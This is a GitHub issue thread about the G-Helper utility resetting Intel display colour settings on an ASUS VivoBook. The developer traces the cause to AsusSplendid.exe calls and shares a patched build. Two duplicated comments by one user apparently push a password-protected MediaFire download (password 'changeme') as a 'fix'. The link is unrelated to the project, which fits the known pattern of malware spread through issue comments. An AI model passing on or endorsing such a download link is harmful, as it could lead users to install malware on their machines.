### ISSUE TITLE
Launching G-helper resets Intel display custom color settings.

### ISSUE THREAD

**Issue by hadoooooouken** [seerge/g-helper#3046]
### Rules

- [X] I made myself familiar with the <a href='https://github.com/seerge/g-helper?tab=readme-ov-file'>Readme</a>, <a href='https://github.com/seerge/g-helper/wiki/FAQ'>FAQ</a> and <a href='https://github.com/seerge/g-helper/wiki/Troubleshooting'>Troubleshooting</a>.
- [X] I understand that, if insufficient information or no app logs will be provided, my issue will be closed without an answer.

### What's wrong?

Launching G-helper resets my custom color settings for display from Intel Graphics Command Center.
https://www.youtube.com/watch?v=L7NtUmrj32o
(the settings are reset and the display becomes brighter)

### How to reproduce the bug?

1. Edit any color setting at Intel Graphics Command Center.
2. Relaunch G-helper.

### Logs

[log.txt](https://github.com/user-attachments/files/16830758/log.txt)

### Device and Model

ASUS VivoBook 16 X1605ZA-MB316 (90NB0ZA2-M00H60)

### Additional information.

I have already encountered similar behavior with official asus bloatware.
Then the following solution helped me:
https://answers.microsoft.com/en-us/windows/forum/all/solution-to-asus-color-profile-issue/f280ea45-271f-4927-afdc-11503b330a65
(C:\ProgramData\ASUS\ASUS System Control Interface\AsusOptimization\Splendid: edit the "USER_my_sp_data.sys" and changing ICMExist= from YES to NO + change the file to Read Only to prevent Asus Optimization from overwriting it every time the computer restarted.)

### Armoury Crate

Uninstalled

### Asus Services

None

### Version

0.184

### OS

Windows 11

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by seerge** [comment]
@hadoooooouken hello,

It's because Visual Modes (in G-Helper) or Game Visual (in Amoury Crate) call `AsusSplendid.exe` to set them. And it in turn modifies color profile.

```
02.09.2024 2:06:46: C:\Windows\system32\DriverStore\FileRepository\asussci2.inf_amd64_dce8906ce88264fa\ASUSOptimization\AsusSplendid.exe 6 0 50
```

I see that you use   `VivoManual = 6` mode.

If you don't want visual modes to interfere, just select a `Default` mode and then on next launch G-Helper just won't launch AsusSplendid.exe at all. So you can set your custom colors under Intel Graphics Command Center.

Thanks

**Comment by seerge** [comment]
@hadoooooouken actually, I just realized that app would skip AsusSplendid call only for ROG / TUF devices, not for Vivobooks

This build should skip it for you as well (assuming you have `Default` selected)
 
[GHelper.zip](https://github.com/user-attachments/files/16834535/GHelper.zip)

**Comment by hadoooooouken** [comment]
thx, with this build it works ae expected.

**Comment by hadoooooouken** [comment]
thx, with this build it works ae expected.
